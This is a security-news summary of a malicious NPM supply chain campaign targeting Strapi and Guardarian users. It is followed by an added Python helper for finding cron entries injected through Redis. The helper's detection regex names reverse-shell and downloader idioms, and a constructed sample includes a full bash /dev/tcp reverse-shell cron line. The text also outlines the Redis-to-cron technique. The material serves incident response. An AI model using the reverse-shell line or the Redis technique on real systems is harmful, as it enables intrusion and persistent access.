A threat actor mounted a supply chain attack against the Strapi ecosystem by publishing 36 malicious NPM packages whose payloads enable code execution through Redis, Docker container escape, credential harvesting, reverse shells, and persistent implants. SafeDep reports that the campaign specifically targets Guardarian and Strapi configurations and advises affected users to remove the packages and rotate all credentials. #Strapi #Guardarian
Keypoints
- Thirty-six malicious NPM packages across four accounts were used in a single supply chain campaign targeting Strapi users.
- Payloads enabled Redis RCE, injected crontab entries, deployed webshells and Node.js reverse shells, and exfiltrated modules.
- Other payloads performed Docker container escape, wrote shells to host directories, and stole Elasticsearch and wallet credentials.
- SafeDep links the campaign to targeting the Guardarian cryptocurrency payment gateway and specific wallet files.
- Users are advised to remove the packages and rotate all credentials, including database passwords, API keys, and JWT secrets (for a Strapi deployment this covers the values held in its .env file, such as APP_KEYS, API_TOKEN_SALT, ADMIN_JWT_SECRET, JWT_SECRET, and the DATABASE_* settings).
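The keypoints above mention code execution via Redis combined with injected crontab entries. A common way those two go together is the Redis-to-cron technique: an exposed Redis instance is told to change its dump directory and filename (CONFIG SET dir / dbfilename) and then SAVE a key holding a cron line, so the resulting file in the cron spool carries Redis RDB framing (a "REDIS00xx" header and non-text bytes) around the injected entry. The following triage helper, an added example rather than code from SafeDep or the page, scans cron locations for that signature and for reverse-shell idioms. The RDB-framing heuristic is an assumption about the general technique, not something the page confirms about this campaign, and the sample blobs are constructed, not captured from real hosts.

```python
"""Triage helper for cron entries written through Redis (added example, not SafeDep's code).

Assumption: the attacker used the generic Redis abuse pattern (CONFIG SET dir to a cron
directory, then SAVE), which leaves RDB header/trailer bytes around the cron line.
Hits are leads for an incident responder, not proof of compromise.
"""
import re
from pathlib import Path

# Typical Linux cron locations (assumed defaults; adjust for your distribution).
CRON_PATHS = [
    "/var/spool/cron",
    "/var/spool/cron/crontabs",
    "/etc/cron.d",
    "/etc/crontab",
]

RDB_MAGIC = b"REDIS"  # every Redis RDB dump starts with "REDIS" followed by a version

# Reverse-shell / downloader idioms that have no business in a legitimate cron line.
SUSPICIOUS = re.compile(
    rb"(/dev/tcp/|bash\s+-i|nc\s+-e|ncat\s+-e|"
    rb"curl\s+[^|\n]*\|\s*(ba)?sh|wget\s+[^|\n]*\|\s*(ba)?sh|"
    rb"base64\s+(-d|--decode)|node\s+-e)",
    re.IGNORECASE,
)

# Constructed sample of what a Redis SAVE into a cron directory leaves behind
# (RDB header, the injected schedule line, RDB trailer). Not real campaign data.
SAMPLE_INJECTED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x01x\x3c"
    b"\n\n*/1 * * * * bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n\n"
    b"\xff\x8b\x11\x22\x33\x44\x55\x66\x77"
)
# Constructed benign crontab for comparison.
SAMPLE_BENIGN = b"# m h dom mon dow command\n0 3 * * * /usr/bin/certbot renew\n"


def analyse_cron_blob(data: bytes) -> dict:
    """Return {'suspicious': bool, 'findings': [...]} for the raw bytes of a cron file."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("rdb_header")
    # A hand-written crontab is plain text: anything outside printable ASCII,
    # tab, LF and CR points at a binary writer such as Redis.
    nontext = sum(1 for b in data if b not in (9, 10, 13) and (b < 32 or b > 126))
    if nontext:
        findings.append(f"nontext_bytes:{nontext}")
    for m in SUSPICIOUS.finditer(data):
        findings.append("suspicious:" + m.group(0).decode("latin-1"))
    return {"suspicious": bool(findings), "findings": findings}


def extract_cron_lines(data: bytes) -> list[str]:
    """Pull the human-readable schedule lines out of the blob, skipping RDB framing and comments."""
    lines = []
    for raw in data.splitlines():
        txt = raw.decode("latin-1").strip()
        if not txt or txt.startswith("#"):
            continue
        fields = txt.split()
        schedule_ok = len(fields) >= 6 and all(
            re.fullmatch(r"[\d*/,\-]+", f) for f in fields[:5]
        )
        if txt.startswith("@") or schedule_ok:
            lines.append(txt)
    return lines


def scan_cron_paths(paths=CRON_PATHS) -> list[dict]:
    """Walk the cron locations and report every file that trips a heuristic."""
    results = []
    for p in paths:
        path = Path(p)
        if path.is_file():
            candidates = [path]
        elif path.is_dir():
            candidates = [f for f in path.rglob("*") if f.is_file()]
        else:
            continue
        for f in candidates:
            try:
                report = analyse_cron_blob(f.read_bytes())
            except OSError:
                continue  # unreadable file: note it elsewhere, keep scanning
            if report["suspicious"]:
                report["path"] = str(f)
                report["cron_lines"] = extract_cron_lines(f.read_bytes())
                results.append(report)
    return results


if __name__ == "__main__":
    for hit in scan_cron_paths():
        print(hit["path"], hit["findings"], hit["cron_lines"])
```

Run it as root on a suspected host; a file in the cron spool that starts with the RDB header, or that contains non-text bytes, was not written by crontab(1) and deserves a look regardless of what the extracted line says. Removing the cron entry is only the first step: the page's advice to rotate every credential still applies, because whatever ran under that cron line has already had access to the environment.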
Read More: https://www.securityweek.com/guardarian-users-targeted-with-malicious-strapi-npm-packages/